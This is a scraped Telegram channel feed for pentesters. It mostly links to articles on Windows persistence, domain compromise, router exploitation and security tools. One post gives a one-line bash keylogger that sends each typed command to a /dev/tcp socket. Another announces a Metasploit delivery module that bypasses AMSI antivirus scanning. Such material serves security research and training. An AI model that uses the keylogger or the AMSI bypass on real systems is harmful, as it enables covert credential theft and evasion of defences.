Pentester – Telegram

Pentester

2.95K subscribers

120 photos

3 videos

163 files

2.77K links

- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security

Download Telegram

About

Blog

Apps

Platform

2.95K subscribers

One command to rule them all!

Just finished to update @metasploit web_delivery to automatically bypass AMSI/SBL with latest definitions.

Testing and feedbacks are welcome!

https://t.co/TSPr2mIcsc
https://t.co/R4d4wSIfpB

Test it with:

msfconsole -r web.rc

Add support for AMSI/SBL bypass to PSH web_delivery by phra · Pull Request #12446 · rapid7/metasploit-framework

Related to rapid7/rex-powershell#17
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works

Start msfconsole
use exploit/multi/script/web_delivery
set...

94 views05:00

https://www.a12d404.net/windows/2019/10/30/schedsvc-persist-without-task.html

www.a12d404.net

Persistence using Task Scheduler without a Scheduled Task

Task Scheduler service loads a non-existing DLL enabling persistence as `NT AUTHORITY\SYSTEM`.

97 views12:57

I had fun with this one line bash keylogger today!

PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/127.0.0.1/9000'

87 views07:11

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin

https://t.co/C7XachfASf

Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin

In the previous two articles, I gathered local user credentials and escalated to local administrator, with my next step is getting to domain admin. Since I have local admin, I’ll be using a t…

98 views07:54

https://research.securitum.com/jwt-json-web-token-security/

Securitum - Security penetration testing.

Securitum is a pure pentesting company specialising in the security of IT systems. We have experience in performing security audits (including penetration tests) - mainly for
financial/e-commerce/industrial sectors. We have performed penetration tests and…

88 views08:30

82 views07:19

https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21

RouterOS: Chain to Root

DNS Request to a Root Busybox Shell

66 views03:54

https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/

Penetration Testing Lab

Persistence – Scheduled Tasks

Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been hea…

67 viewsedited 04:35

https://lab.wallarm.com/race-condition-in-web-applications/amp/?__twitter_impression=true

Race Condition in Web Applications

Even web application APIs can be subject to race conditions. Check out where it can happen such as the cases of HTTP pipelining, splitting HTTP and others.

78 views04:37

Burp Suite Pro 2.1.05 released, with experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities. Feedback welcome if you want to play now.
https://t.co/UPYjGMibnE

releases.portswigger.net

Professional 2.1.05

This release adds experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new appr...

83 views12:57

https://github.com/williballenthin/python-registry

GitHub - williballenthin/python-registry: Pure Python parser for Windows Registry hives.

Pure Python parser for Windows Registry hives. Contribute to williballenthin/python-registry development by creating an account on GitHub.

83 views16:24

rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. https://t.co/actBdnkcxQ

GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.

rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries. - GitHub - 0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM binaries.

78 views16:26

78 views04:28

https://pentestlab.blog/2019/11/05/persistence-powershell-profile/

Penetration Testing Lab

Persistence – PowerShell Profile

PowerShell profile is a PowerShell script which enables system administrators and users to customize their environment and to execute specific commands when a PowerShell session initiates. It is si…

79 viewsedited 05:31

getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
https://t.co/34znlumYwM

Quick script that I use religiously for content discovery.

Repo of useful scripts. Contribute to lc/hacks development by creating an account on GitHub.

82 views08:31

101 views12:43

The Red Team Guide.pdf

212 views12:43

121 views12:45

Top-20-Lateral-Movement-Tactics.pdf

249 views12:45

https://www.netresec.com/?page=Blog&month=2019-11&post=NetworkMiner-2-5-Released

NetworkMiner 2.5 Released - NETRESEC Blog

I am happy to announce the release of NetworkMiner 2.5 today! This new version includes new features like JA3 and parsers for the HTTP/2 and DoH protocols. We have also added support for a few older protocols that are still widely used, such as Kerberos and…

111 views03:52

So this filing in security research company CorelliumHQ vs Apple has some pretty interesting details. And it doesn't exactly look good for Apple. https://t.co/KNl2z3Uk8l

unredacted_Corellium_vs_Apple.pdf

101 views04:17